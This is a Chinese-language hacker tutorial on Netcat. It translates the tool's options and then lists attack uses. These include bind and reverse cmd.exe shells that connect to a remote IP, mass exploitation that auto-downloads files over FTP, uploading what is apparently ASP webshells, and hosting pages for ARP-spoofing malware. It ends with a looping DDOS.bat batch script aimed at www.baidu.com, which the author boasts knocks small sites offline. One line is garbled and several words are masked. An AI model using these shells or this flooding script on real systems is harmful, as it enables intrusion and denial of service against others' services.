NC介绍:
    NC全名为Netcat (网络刀),简称NC,作者:Hobbit&&ChrisWysopal。因为其功能十份强大,体积小巧
而出名,又被大家称为 "瑞士×××"。
NC的使用:
在命令行下输入nc.exe -h就可以看到全部命令了。如下:
connect to somewhere:   nc [-options] hostname port[s] [ports] ...
listen for inbound:     nc -l -p port [options] [hostname] [port]
options:
        -d              detach from console, stealth mode
        -e prog         inbound program to exec [dangerous!!]
        -g gateway      source-routing hop point[s], up to 8
        -G num          source-routing pointer: 4, 8, 12, ...
        -h              this cruft
        -i secs         delay interval for lines sent, ports scanned
        -l              listen mode, for inbound connects
        -L              listen harder, re-listen on socket close
        -n              numeric-only IP addresses, no DNS
        -o file         hex dump of traffic
        -p port         local port number
        -r              randomize local and remote ports
        -s addr         local source address
        -t              answer TELNET negotiation
        -u              UDP mode
        -v              verbose [use twice to be more verbose]
        -w secs         timeout for connects and final net reads
        -z              zero-I/O mode [used for scanning]
port numbers can be individual or ranges: m-n [inclusive]
 
为了方便菜鸟理解,我把参数翻译过来:
 
 -h  查看帮助信息
 -d  后台模式
 -e  prog程序重定向,一但连接就执行[危险]
 -i  secs延时的间隔
 -l  监听模式,用于入站连接
 -L  监听模式,连接天闭后仍然继续监听,直到CTR+C
 -n  IP地址,不能用域名
 -o  film记录16进制的传输
 -p [空格]端口 本地端口号
 -r  随机本地及远程端口
 -t  使用Telnet交互方式
 -u  UDP模式
 -v  详细输出,用-vv将更详细
 -w 数字 timeout延时间隔
 -z  将输入,输出关掉(用于扫锚时)
先讲讲一些简单的用法:
nc -nvv 192.168.0.1 80                           连接到192.168.0.1主机的80端口
nc -l -p 80                                      开启本机的TCP 80端口并监听
nc -nvv -w2 -z 192.168.0.1 80-1024               扫锚192.168.0.1的80-1024端口

高级用法:
nc -L -p 3389                      做蜜罐,不停地监听3389端口
nc -L -p 3389>c:\log.txt           做蜜罐,不停地监听3389端口,同时把结果输出到c:\log.txt
nc -L -p 3389                                   机,可起到传送文件作用.(此用法经常用于反向溢出)
nc -l -p 2008 -t -e cmd.exe        绑定主机的cmd到2008端口,并以TELNET方式应答。
nc -t -e cmd.exe 192.168.0.2 555   绑定cmd反向连接192.168.0.2的555端口以TELNET方式应答。
组合用法:
 1.溢出用:
   nc -L -p 8989   效果:一但溢出的主机连接8989端口就会自动用FTP下载指定的文件,如***.(此法经常用于批量溢出)
 2.返回CMD SHELL用:
 正向连接:
   在远程主机上运行 nc -l -p 2008 -t -e cmd.exe
   本机运行         nc -nvv 192.168.0.1 2008
   连接成功就会返回一个CMD shell。(类似TELNET)
 反向连接:
   先在本机运行     nc -l -p 2008
   在远程主机上运行 nc -t -e cmd.exe 192.168.0.2 2008
   连接成功就会得到一个CMD shell。(类似TELNET)
 3.上传文本
   本机运行         nc -vv [url]www.baidu.com[/url] 80<1.txt   (此法经常用于上传ASP***)
   本机运行         nc -nvv 192.168.0.1 80<1.txt    (向192.168.0.1发送1.txt中的内容)
本人自创用法和其他变态用法:
  一.NC架设简单的HTTP服务器
    本机运行        nc -l -p 80    注:此法只能架设简单的HTTP服务器,只有一个主页页面,多人访问还会假死。所以只能玩玩用。
       (但是此法经常用于局域网ARP欺骗挂马架设简易HTTP) 
  二.利用NC进行DDOS轰炸
    本机运行        nc -vv [url]www.baidu.com[/url] 80<1.txt    (1.txt中为垃圾信息)
    可以简单的用一个批处理实现循环***
     echo off
     color a
     :1
        cls
     nc -vv [url]www.baidu.com[/url] 80<1.txt
        goto 1
    保存为DDOS.bat,运行即可.
    注:此招***一些小型网站十分管用,尽管一台机器效果不明显,但是几十台同时运行每台又同时
运行N个,网站的IIS就会出错,甚至挂掉。(次招屡试不爽.....)嘿嘿....